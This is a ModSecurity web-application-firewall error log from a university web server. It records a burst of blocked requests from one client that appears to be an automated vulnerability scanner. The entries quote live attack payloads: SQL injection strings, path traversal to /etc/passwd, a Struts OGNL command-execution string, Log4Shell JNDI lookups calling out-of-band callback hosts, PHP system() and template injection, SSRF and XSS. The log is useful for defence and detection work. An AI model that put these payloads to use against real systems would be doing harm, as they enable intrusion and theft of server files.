[Tue Aug 29 11:35:03.320965 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAAUDQT0AAAA7"]
[Tue Aug 29 11:35:03.327636 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAVPX3AAAAAF"]
[Tue Aug 29 11:35:03.340828 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAASOUqEAAAAR"]
[Tue Aug 29 11:35:04.337841 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAAT2JRcAAAAz"]
[Tue Aug 29 11:35:04.345396 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlgy3n1ggiuanfth.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11eMCo-f0AAATQXiUAAAAO"]
[Tue Aug 29 11:35:05.308628 2023] [:error] [pid 1360] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlgcc1ybf9wohccx.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAAVQYyIAAAAI"]
[Tue Aug 29 11:35:06.353639 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgwg6wydmt9bb71.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlgwg6wydmt9bb71.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAAVRxc8AAAAQ"]
[Tue Aug 29 11:35:07.351822 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAAVJXlIAAAAA"]
[Tue Aug 29 11:35:07.380048 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAAUDQUMAAAA7"]
[Tue Aug 29 11:35:08.363527 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAAVPX3UAAAAF"]
[Tue Aug 29 11:35:09.339433 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAATUxScAAAAW"]
[Tue Aug 29 11:35:10.332568 2023] [:error] [pid 1286] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAAUGZBAAAAA@"]
[Tue Aug 29 11:35:10.345306 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAATavv4AAAAg"]
[Tue Aug 29 11:35:10.351294 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAATUxSgAAAAW"]
[Tue Aug 29 11:35:12.316318 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gMCo-f0AAAULx9kAAABD"]
[Tue Aug 29 11:35:12.362272 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATfd5AAAAAk"]
[Tue Aug 29 11:35:12.486679 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAUJIz0AAABB"]
[Tue Aug 29 11:35:12.748817 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAUJIz0AAABB"]
[Tue Aug 29 11:35:13.198529 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAAUKhBgAAABC"]
[Tue Aug 29 11:35:13.303233 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAAUKhBgAAABC"]
[Tue Aug 29 11:35:13.322732 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAAUdm5YAAABS"]
[Tue Aug 29 11:35:14.316385 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAATlLGgAAAAq"]
[Tue Aug 29 11:35:14.345242 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAAULx94AAABD"]
[Tue Aug 29 11:35:16.159174 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "mbkm.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAAVPX30AAAAF"]
[Tue Aug 29 11:35:16.350523 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAASOUq8AAAAR"]
[Tue Aug 29 11:35:16.366723 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAATQXjoAAAAO"]
[Tue Aug 29 11:35:16.401391 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "mbkm.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAAVPX38AAAAF"]
[Tue Aug 29 11:35:18.501636 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAAVmuK4AAAAT"]
[Tue Aug 29 11:35:18.534723 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAAVWQBIAAAAV"]
[Tue Aug 29 11:35:19.314579 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11h8Co-f0AAAUOaWcAAABG"]
[Tue Aug 29 11:35:21.313046 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:vars[1][]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:vars[1][]: vars[1][]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11icCo-f0AAAUKhB0AAABC"]
[Tue Aug 29 11:35:22.332690 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11isCo-f0AAATWYUMAAAAa"]
